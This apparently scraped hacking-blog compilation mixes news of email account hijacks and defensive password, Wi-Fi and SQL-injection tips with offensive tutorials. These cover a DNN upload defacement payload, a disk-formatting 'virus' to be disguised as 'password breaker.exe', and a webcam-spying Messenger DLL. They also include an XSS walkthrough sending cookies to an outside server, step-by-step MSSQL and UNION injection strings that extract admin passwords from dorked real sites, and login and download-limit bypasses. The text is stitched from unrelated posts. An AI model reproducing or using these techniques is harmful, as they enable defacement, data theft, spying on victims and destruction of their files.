BANGALORE: The Joint Director of Technical Education Department in Palace Grounds has fallen prey to hacking and email fraud.His official email ID was hacked and a number of messages were sent to a number of government employees seeking help.Joint Director R Krishnamurthy said his official email ID created by the government department, jointdirectoredu@yahoo.com, was hacked and the password was changed."The email ID was used for communicating with students and other government officials on official matters. All the members in the contact list have received a mail saying that I am stranded in Barcelona, Spain, and have lost my wallet and my phone. As I have no money to pay my dues of the hotel, please send 2,500 Euros," says the complaint filed by Krishnamurthy.One of the recipients of the mail, Smitha, who is the technical assistant with the egovernance department, informed Krishnamurthy and a case was registered.Police said a Kirloskar distributor, K Venkatesh, has complained that his email ID was hacked and obscene matters were mailed from his ID. Vidhana Soudha police have taken up the case.A similar incident reported in Commercial Street Police station limits with a citybased software engineer, Niraj Sharma, complaining that his email was hacked and mail seeking financial assistance was sent to his contacts.
Taken from: expressbizz.com
Now my advice for the users
This is the example of week pasword nothing else.So advice for all the users is
1.To keep there pasword strong with numerical,capital leters and special characters ex: cr34t2r_radheR6 n all ..........
2.Never share your password with others and keep ur social networking password other than ur real id password.
3.Never click on unknown links and banners.Hackers use some scripts which usually takes ur password and send it to hackers adress .This only happens when you click on those links...
4.Some websites asks for signup before using it like way2sms,n all so use password other then your real password because websites are not safe and their data can be easily dump by the hackers.....
So these are some ways which we should keep in mind to be secure.
Guys in this post ill show u how to hack website by DNN exploit
First of all find vulnerable website using google dork: inurl:"/portals/0"
You can also modify this google dork according to your need & requirement
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For e.g. in case of http://www.wittur.se ..the image is located at location- http://www.wittur.se/Portals/0/SHM.jpg
hehehe it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site
After selecting the third option, replace the URL bar with below script
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT,S IT you have hacked the website.
Notepad is a basic text editor you can use for simple documents or for creating Web pages. To create or edit files that require formatting, use WordPad. To open Notepad, click Start, point to All Programs, point to Accessories, and then click Notepad. But now I will show you how you can create a dangerous script in binary language to format hard disk by just running it. First open the notepad as I shown above and type the below given binaryvalue
Now save this as any desired name i like password breaker.exe ,because many people when received this start opening that without inspecting anything.
Here is the virus ready to send, it will format c drive of your hard disk.
Suggesion: -“Do not use this hack to break law in your country. This is for just education purpose only to show how hacker creates such type of viruses and also do not test this hack on your own computer or office where critical data is stored”
In Ahemdabad blast terrorists use unsecure WiFi connection to send emails.And the owner of wifi becomes in problem.so this is something related to nations as well as your security.You should secure your wifi so that no one except you can use your wifi.Now how to secure your wifi?
1. Install a Firewall A firewall helps protect your PC by preventing unauthorized users from gaining access to your computer through the Internet or a network. It acts as a barrier that checks any information coming from the Internet or a network, and then either blocks the information or allows it to pass through to your computer.
2. Change the Administrative Password on your Wireless Routers Each manufacturer ships their wireless routers with a default password for easy initial access. These passwords are easy to find on vendor support sites, and should therefore be changed immediately.
3. Change the Default SSID Name and Turn Off SSID Broadcasting This will require your wireless client computers to manually enter the name of your SSID (Service Set Identifier) before they can connect to your network, greatly minimizing the damage from the casual user whose laptop is configured to connect to any available SSID broadcast it finds. You should also change the SSID name from the factory default, since these are just as well-known as the default passwords. NOTE: Even though the SSID is disabled the SSID is included in the data packets that are transmitted and is easy to discover.
4. Disable DHCP For a SOHO network with only a few computers, consider disabling DHCP (Dynamic Host Configuration Protocol) on your router and assigning IP addresses to your client computers manually. On newer wireless routers, you can even restrict access to the router to specific MAC addresses.
5. Replace WEP with WPA WEP (Wired Equivalent Privacy) is a security protocol that was designed to provide a wireless computer network with a level of security and privacy comparable to what is usually expected of a wired computer network. WEP seeks to establish security by encrypting data transmitted over the wireless computer network. Data encryption protects the vulnerable wireless link between clients and access points. Once this measure has been taken, other typical wire computer network security mechanisms such as password protection, end-to-end encryption, virtual private networks (VPN's), and authentication can be put in place to ensure privacy. Unfortunately, WEP is a very weak form of security that uses common 60 or 108 bit key shared among all of the devices on the network to encrypt the wireless data. Hackers can access tools freely available on the Internet that can crack a WEP key in as little as 15 minutes. Once the WEP key is cracked, the network traffic instantly turns into clear text – making it easy for the hacker to treat the network like any open network. WPA (Wi-Fi Protected Access) is a powerful, standards-based, interoperable security technology for wireless computer networks. It provides strong data protection by using 128-bit encryption keys and dynamic session keys to ensure a wireless computer network's privacy and security. Many cryptographers are confident that WPA addresses all the known attacks on WEP. It also adds strong user authentication, which was absent in WEP.
4) After Downloading it, Paste this in (C:\Program Files\Yahoo!\Messenger)
NOTE: Don’t replace the file. Delete the file first and then paste the cracked file in the same folder
Then close every thing and restart the system…
How it works?
The cracked “dll” file should be placed in the victims computer (whose web cam u want to see). Then you go back to your system and login to your messenger and place a “request” to see their cam. Then definitely they will press “NO” this is the place where the crack will work. The moment they press “NO” u will start seeing them. This is the hack. Enjoy
Guys as i found many website posts how to hack website by sql injection but no one tells how to secure your website from sql injection.so i found this post helpfull, so i have posted it here.
SQL Injection still used by script kiddies , gery and even by black hat hackers, its the easiest way to hack into some one's website. So today in this article i will give you some tips to, how to prevent SQL injection on your own or may be company's website.
1. Don't allow special characters As we all know the SQL strings are often having special symbol strings, making a combination on OR and =. So try to have stroke procedures instead of SELECT * FROM table name where Username="..." and Password="...", This is the global code and vulnerable. So try to validate your code and try to avoid acceptance of special symbols.
2. Use Email Instead of User ID
The best way to prevent SQL injection is to have use of Suer name as Email address. So what is happening here the code written will validate in such a way that it will not accept anything else instead of EMAIL address. Thus SQL injection strings are non acceptable hence SQL injection can be prevented.
3. Try to Hide Your Admin Login Page
Well there is no security in this universe there is only opportunity, and if you are showing your ADMINLOGIN page link on your website then that means you are giving the opportunity to the HACKER. Its an obvious thing that SQL injection can only be done through on your admin login panel (Some times through URL) and User login panel. So don't show ur adminlogin link direct on your website.
4. Don’t use default AdminLogin page
Other way is to protect your website from SQL injection is to name ur AdminLogin according to you. Try to hvae login page links like "powerlogin.asp","herologin.asp" means something different which cannot be found eaisly on the Google hacks. So when a hacker try to search your admin login page he/she(for Female hackers he he), he will search for adminlogin.asp,admin/login.asp something like this. and as result will be frustrated and hence will leave your website.
5. Social Engineering
Don't disclose your website vulnerabilities to anyone. try to get help from GOD istself GOD here i call (GOOGLE). Instead of discussing your website vulnerabilities to a single person try to search for the solutions on google.And last but not least have an WARNING message on your login pages something scary like" We are using transparent proxy do not try to and HACK, otherwise an legal action would be taken.". That code really works he he, at least before trying to hack into you website, he will think twice. So hope this unique article will help the website developers to prevent SQL injection attacks. This is the first ever article by anyone having these techniques. So please don't copy hope soon i will take copyright on this. Happy Hacking :) There are number of things you can do... I will show you a few more herefor PHP Devolpers ...
Alternative one
Lets say thins is your code:
Code:
<?php
$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
echo($result);
?>
This means that you are selecting the page content witch is 'text' from 'pages' in the SQL database, and you are sorting out the right page content with $_GET['id'] and $_GET['id'] is the thing in the url... Example; http://google.com/index.php?id=123
This code is easely injecteble... But if you do this:
Code:
<?php
$result = mysql_query('SELECT text FROM pages WHERE id=' . mysql_real_escape_string($_GET['id']));
echo($result);
?>
You are 100% secure
Alternative two
This one is not as good as the first one... But still works
Again we say this is your php code:
Code:
<?php
$result = mysql_query('SELECT text FROM pages WHERE id=' . $_GET['id']);
echo($result);
?>
Again this is verry simple to inject... But if you check $_GET['id'] for "iligal" characters! Like this:
Code:
<?php
Its a warning to newbies...........................be aware
A youth who hacked into a girl's profile on a social networking website, and morphed her pictures and posted lewd messages, was arrested on Tuesday. The police picked up Pramod Nana Bavdekar (29) from his residence in Andheri and also seized his computer and a hard disc.
On November 8, when the girl, who rebuffed Bavdekar, tried to log in to the website, she noticed a message saying her ID was in use by another person. She consulted an expert, who told her that the profile had been hacked. After a few days, she was shocked to see her nude pictures on the profile, with the message: "I am a prostitute." She found that her bank account number and other personal details too were posted on the webpage. Recently, she received four letters through courier with similar messages and pictures, after which she lodged a complaint with the cyber division of the BKC police station. In her complaint, she mentioned that she suspected Bavdekar, a former neighbour who had proposed to her two years ago. According to the police, though the girl was being harassed for long, she filed the complaint only last week because she could not take the humiliation any longer. Bavdekar has been booked under a few provisions of the Information Technology Act and remanded in police custody till December 21.
Guys i got some questions from many newbies that what is "cross site scripting "and how to hack a website by xss or css.so i decided to post this article..and one question which is usally in the mind of newbies and many normal people..i got lots of listining that what is hacking? Is der any scope in it? what to do by hacking?and many questions like these....m writing on this topic, soon ill publish this article... so lets begain with XSS OR CSS....
Cross site scripting (also known as XSS) occurs when web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, instant message, or simply just reading a web board or email message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request is less suspicious looking to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner to make it appear as valid content from the website. Many popular guestbook and forum programs allow users to submit posts with html and javascript embedded in them. If for example I was logged in as "john" and read a message by "joe" that contained malicious javascript in it, then it may be possible for "joe" to hijack my session just by reading his bulletin board post. Further details on how attacks like this are accomplished via "cookie theft" are explained in detail below.
"What does XSS and CSS mean?"
Often people refer to Cross Site Scripting as CSS. There has been a lot of confusion with Cascading Style Sheets (CSS) and cross site scripting. Some security people refer to Cross Site Scripting as XSS. If you hear someone say "I found a XSS hole", they are talking about Cross Site Scripting for certain.
"What are the threats of Cross Site Scripting?"
Often attackers will inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool a user (Read below for further details) in order to gather data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. New malicious uses are being found every day for XSS attacks. The post below by Brett Moore brings up a good point with regard to "Denial Of Service", and potential "auto-attacking" of hosts if a user simply reads a post on a message board.
"What are some examples of cross site scripting attacks?"
One product with many XSS holes is the popular PHP program PHPnuke. This product is often targeted by attackers to probe for XSS holes because of its popularity. I have included a few links of advisories/reports that have been discovered and disclosed just from this product alone. The following collection should provide plenty of examples.
"Can you show me what XSS cookie theft looks like?"
Depending on the particular web application some of the variables and positioning of the injections may need to be adjusted. Keep in mind the following is a simple example of an attacker's methodology. In our example we will exploit a cross site scripting hole in a perimeter of "a.php" called "variable" via a normal request. This is the most common type of cross site scripting hole that exists.
Step 1: Targeting
After you have found an XSS hole in a web application on a website, check to see if it issues cookies. If any part of the website uses cookies, then it is possible to steal them from its users.
Step 2: Testing
Since XSS holes are different in how they are exploited, some testing will need to be done in order to make the output believable. By inserting code into the script, its output will be changed and the page may appear broken. (The end result is crucial and the attacker will have to do some touching up in the code to make the page appear normal.) Next you will need to insert some Javascript (or other client side scripting language) into the URL pointing to the part of the site which is vulnerable. Below I have provided a few links that are for public use when testing for XSS holes. These links below, when clicked on will send the users cookie to www.cgisecurity.com/cgi-bin/cookie.cgi and will display it. If you see a page displaying a cookie then session hijacking of the user's account may be possible.
Cookie theft Javascript Examples.
A example of usage is below.
These are the examples of "evil" Javascript we will be using. These Javascript examples gather the users cookie and then send a request to the cgisecurity.com website with the cookie in the query. My script on cgisecurity.com logs each request and each cookie. In simple terms it is doing the following:
cookie = user=zeno; id=021
script = www.cgisecurity.com/cgi-bin/cookie.cgi
It sends a request to site that looks like this.
GET /cgi-bin/cookie.cgi?user=zeno;%20id=021 (Note: %20 is a hex encoding for a space)
This is a primitive but effective way of grabbing a user's cookie. Logs of the use of this public script can be found at www.cgisecurity.com/articles/cookie-theft.log
Step 3: XSS Execution
Hand out your crafted url or use email or other related software to help launch it. Make sure that if you provide the URL to the user(through email, aim, or other means) that you at least HEX encode it. The code is obviously suspicious looking but a bunch of hex characters may fool a few people.
For example forward the user to cookie.cgi. A attacker with more time could do a few redirects and XSS combo's to steal the user's cookie, and return them to the website without noticing the cookie theft.
Some email programs may execute the Javascript upon the opening of a message or if the Javascript is contained in a message attachment. Larger sites like Hotmail do allow Javascript inside attachments but they do special filtering to prevent cookie theft.
Step 4: What to do with this data
Once you have gotten the user to execute the XSS hole, the data is collected and sent to your CGI script. Now that you have the cookie you can use a tool like Websleuth to see if account hijacking is possible.
This is only a FAQ, not a detailed paper on cookie theft and modification. A new paper released by David Endler of iDefense goes into more detail on some of the ways to automatically launch XSS holes. This paper can be found at http://www.idefense.com/XSS.html.
"What can I do to protect myself as a vendor?"
This is a simple answer. Never trust user input and always filter metacharacters. This will eliminate the majority of XSS attacks. Converting < and > to < and > is also suggested when it comes to script output. Remember XSS holes can be damaging and costly to your business if abused. Often attackers will disclose these holes to the public, which can erode customer and public confidence in the security and privacy of your organization's site. Filtering < and > alone will not solve all cross site scripting attacks. It is suggested you also attempt to filter out ( and ) by translating them to ( and ) , " to " , ' to ' , and also # and & by translating them to #(#) and & (&). A more complete list of entities can be found at http://tntluoma.com/sidebars/codes/ .
"How to protect myself as a user?"
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view. If you visit one website and it links to CNN for example, instead of clicking on it visit CNN's main site and use its search engine to find the content. This will probably eliminate ninety percent of the problem. Sometimes XSS can be executed automatically when you open an email, email attachment, read a guestbook, or bulletin board post. If you plan on opening an email, or reading a post on a public board from a person you don't know BE CAREFUL. One of the best ways to protect yourself is to turn off Javascript in your browser settings. In IE turn your security settings to high. This can prevent cookie theft, and in general is a safer thing to do.
"How common are XSS holes?"
Cross site scripting holes are gaining popularity among hackers as easy holes to find in large websites. Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had one form or another of XSS bugs. Every month roughly 10-25 XSS holes are found in commercial products and advisories are published explaining the threat.
"Does encryption protect me?"
Websites that use SSL (https) are in no way more protected than websites that are not encrypted. The web applications work the same way as before, except the attack is taking place in an encrypted connection. People often think that because they see the lock on their browser it means everything is secure. This just isn't the case.
"Can XSS holes allow command execution?"
XSS holes can allow Javascript insertion, which may allow for limited execution. If an attacker were to exploit a browser flaw (browser hole) it could then be possible to execute commands on the client's side. If command execution were possible it would only be possible on the client side. In simple terms XSS holes can be used to help exploit other holes that may exist in your browser.
"What if I don't feel like fixing a CSS/XSS Hole?"
By not fixing an XSS hole this could allow possible user account compromise in portions of your site as they get added or updated. Cross Site Scripting has been found in various large sites recently and have been widely publicized. Left unrepaired, someone may discover it and publish a warning about your company. This may damage your company's reputation, depicting it as being lax on security matters. This of course also sends the message to your clients that you aren't dealing with every problem that arises, which turns into a trust issue. If your client doesn't trust you why would they wish to do business with you?
'Cross-site scripting' tears holes in Net security
Along with Microsoft, Grossman also alerted Yahoo, Amazon, America Online and others. He says their sites are equally vulnerable. WhiteHat has posted guidelines on how to eliminate the flaws on its Web site.
But experts remain concerned that cross-site scripting attacks will increase as Web services become more pervasive. The more well-known computer viruses are designed to punch through security firewalls — software that monitors network and Internet traffic and restricts access to data. Cross-site scripting works by embedding malicious code on Web pages with tiny "scripting" programs that make sites more interactive. An unsuspecting Web site visitor then activates the hacker's program by using the corrupted scripting program. Once activated, the rogue program allows the hacker to slip undetected past Web-site firewalls to read e-mail, play pranks and steal information from cookies, which store identification, credit card numbers and other data.Last week, a hacker used cross-site scripting to wipe out desktop icons of Web users visiting Price Loto, a Japanese auction site, prompting the site to temporarily shut down while a patch was devised, says Japan's Information Technology Promotion Agency.
While viruses tend to target specific computer servers — the recent "Code Red" attack, for instance, affected only computers using Microsoft's Internet Information Server — a cross-site scripting attack can lie dormant on just about any Web page. "Cross-site scripting allows a bad guy to trick an innocent guy into running code the bad guy wrote," says Lincoln Stein, a human genome researcher at Cold Spring Harbor Laboratory and author of a book on Web security.
So Guys as we hacked many sqli and my sqli site.Now its time to target Microsoft.In this post ill tell u how to hack MSSQL sites....
There are various types of sql injection for MICROSOFT here as follows:
There are various types of sql injection for MICROSOFT here as follows
1)ODBC Error Message Attack with "CONVERT"
2)ODBC Error Message Attack with "HAVING" and "GROUP BY"
3)MSSQL Injection with UNION Attack
4)MSSQL Injection in Web Services (SOAP Injection)
5)MSSQL Blind SQL Injection Attack
Here m going to explain the first one "sql with convert"
STEP 1:
First we need to find a vulnerable site.
By adding a single quote (') double quote (";") or a semicolon to the field under test.
It's vulnerable in SQL injection,If the output shows some error like this:
[HTTP Response]------------------------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the
character string ''.
/news.asp, line 52
[End HTTP Response]-------------------------------------------------------------------------
Also error could be something like below
Microsoft OLE DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
..../ main_rub.asp, line 4
If the errors like above are shown then site could be vulnerable in SQL
Also you can find vulnerable site from google dork.
eg
inurl:age.asp?id=
inurl:index.asp?sid=
u can see sql dorks in my old posts.
STEP 2:
Now we got our vulnerable website.
CONVERT command is used to convert between two data types and when the specific
data cannot convert to another type the error will be returned.
Now we start with our assessment by finding MSSQL_Version, DB_name.
[http response]-------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.4053.00
(Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.
"information_schema.tables" stores information about tables in databases and there is a field called "table_name"
which stores names of each table."SELECT TOP 1" will show first table in database.
The result of this request is something like this:
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'siteStatus' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
Therefore, we know the first table = "siteStatus", from this error. The next step is looking for the second table.
We only put WHERE clause append the query in above request.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus')))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'headerGraphic' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
Second table 'headerGraphic'
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic')))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
third table 'admin'
Like this you will get each table name from the error.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+tabl e_name+from+information_schema.tables+where+table_ name+not+in+('siteStatus','headerGraphic','admin') ))--
If the query returns something like this.
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22
IT MEANS DATABASE CONTAINS ONLY 3 TABLES 'siteStatus','headerGraphic' n 'admin'. STEP 4:
Now we are all set.....and we will find columns in admin table
We merely change from "information_schema.tables" to "information_schema.columns" and from "table_name" to "column_name"
but we have to add "table_name" in WHERE cluase in order to specify the table which we will pull column names from.
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu mn_name+from+information_schema.columns+where+tabl e_name='admin'))--
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'username' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+colu mn_name+from+information_schema.columns+where+tabl e_name='admin'+and+column_name+not+in+('username') ))--
the response will be
[http response]----------------------------------------
Microsoft OLE DB Provider for SQL Server error '80040e07'
Conversion failed when converting the nvarchar value 'passwd' to data type int.
/includes/templates/header.asp, line 21
-------------------------------------------------------------
So 2nd column is 'passwd'
Do this like we did url manipulation for tables .
Dont forget to add where clause .untill u get error like this.
[http response]----------------------------------------
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/page.asp, line 22
----------------------------------------------------------------- STEP 5: RETRIEVING USENAME n PASSWORD etc
Now lets see what we got from above
table_name: 'admin','siteStatus' n 'HeaderGraphic'
Here we are interestedin 'admin'.So we found columns fo 'admin'
column_name:'username' n 'passwd'
LETS do our work now
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+user name+from+admin))--
You will get first username in terms of error
eg sa_admin
http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+pass wd+from+admin))--
You will get passwd.
eg comic123
So u own .....MSSQL server wid
USERNAME: sa_admin
PASSWORD:comic123
note: 1) you can use AND/OR both 2) Dnt forget , (comma) after 'int' in convert() 3) In error after ' (upper comma) is your table_name of column_name or etc 4)you can enemerate more usernames n passwords by using 'not' command
3:- Right click and click on New, Add Web Folder then enter your vulnerable website address as show below in the image
Google Dork :- "Powered by IIS" ( I don't know the exact dork , but usually I use this one ) 4:- Click on Next , Next , Finish...
Now u can insert your deface page on that site by simply Copy & Paste
Note :-a) Also after getting access to the website...Many websites don't allows you to
add/edit your deface page ( Coz Microsoft has already fixed this vulnerability
in many website )...
Once you’ve done that, it’ll split out its IP address.Next thing you need to do is find out is, it online or offline. (Ping)
Go to
http://www.just-ping.com
& ping the IP obtained in last step.Observe the results from ping. (Okay means online) Now, we need to gather information about the website. (Whois lookup) Go to
http://whois.domaintools.com
& plug up the IP or the website.You’ll see a large amount of information about the website.
Use Google to find even more information about the website.
Once you’re done download, install & open Nmap.Once you have done that, do a –sT –sV scan of the website.[That is put, nmap –sT –sV, in Nmap’s command bar & scan website.]Once done, observe open OS, ports, services running on the website server.]
Once done, you’ll need to find banner of the software.[Banner: It shows the software & version running on ports.]Methods depend on the OS of the server.
For WIN VISTA & 7:
You need to download & Open Netcat.[Because Telnet is disabled in WIN VISTA & 7]
Once done type, nc <IP> <PORT> Ex: nc 127.0.0.1 21 Once you’ve done that, you’ll get a banner.This will be displaying all the details of the software running on port.
For other OS:
Open Telnet
[Start > RUN > telnet]
Once done type, O <IP> <PORT>
Ex: O 127.0.0.1 21
Once you’ve done that, you’ll get a banner.
This will be displaying all the details of the software running on port.
If this doesn’t work you can try the first method.
Once you’ve got the banner, you need to search for vulnerability matching with banner.
Once you’ve got the matching exploit of the same version software.[If you haven’t got, try another port.] You need to edit values, compile & run it.
Most common exploit Coders: Perl
For perl exploits, Copy the exploit in notepad & save it with .pl extension. Download & Install, Active Perl:
http://www.activestate.com/activeperl
Once done, edit the exploit with notepad & double click to run it.
PHP
For PHP exploits, copy & save it in .php extension.
Download & Install WAMP:
http://www.wampserver.com/en/ Once done, edit the exploit with notepad & execute it from CMD.
Python
For python exploits, copy & save it in .py extension.
Download & Install python:
http://www.python.org/download
Once done, edit the exploit with notepad & double click to run it.
C/C++
For C/C++ exploits, copy & save it in notepad. Download & Install Blood Shed. (Google the link) Once done, edit the exploit, compile & double click to run it.
If your exploit is successful you will get access to server,
You’ll be able to edit every part of the website.
If your exploit wasn’t successful try with different port, services & software.
You can also use Metasploit web to search exploits.
Well guys for all those who wanna practice sqli i have something for u.
As usuall go to google search inurl:"cat.php?msid
click on any site
all of them are shitty product of some pakistani web developers.......and all are vunlereable.
all the sites have 6 tables
and well just append
+union+select+1,2,group_concat(table_name),4,5,6+f rom+information_schema.tables+where+table_schema=d atabase()--
to the end of the url to get the list of tables
and well
+union+select+1,2,group_concat(column_name),4,5,6+ from+information_schema.columns+where+table_schema =database()--
so get admin id and pass..........and enjoy...............keep practicing : )
hii guys sometimes you are to lazy to login or u forget password and you quick need some information.so here is the method to bypass the login by faking User agent.
I will show u example of firefox
Type in URL bar following:
about:config
then u should see alot of options which can be changed
just below u will see "Filter:"
Type in box
"useragent" without quotes
We need to change just
general.useragent.extra.firefox
Deafult is Firefox x.x.x or something like that
So how to bypass login on that websites
just double click & type in that field
Googlebot/2.X How Google crawls my site
So websites will think you are google bot and allow u searching on website without login . or another method is use www.bugmenot.com get userid and pass from der and login to site.
Guys now u can download from hotfile,rapidshare,megaupload for free as a premium member .As a premium member u need not to wait for time.below i m listing some links of premium link generator.just check and enjoy downloading...........
No speed limit.but u can download only three files per IP.To bypass this you can restart your modem and can simply change your IP.
Just go to website select server you want,fill captcha and paste link that u want to download
Posts
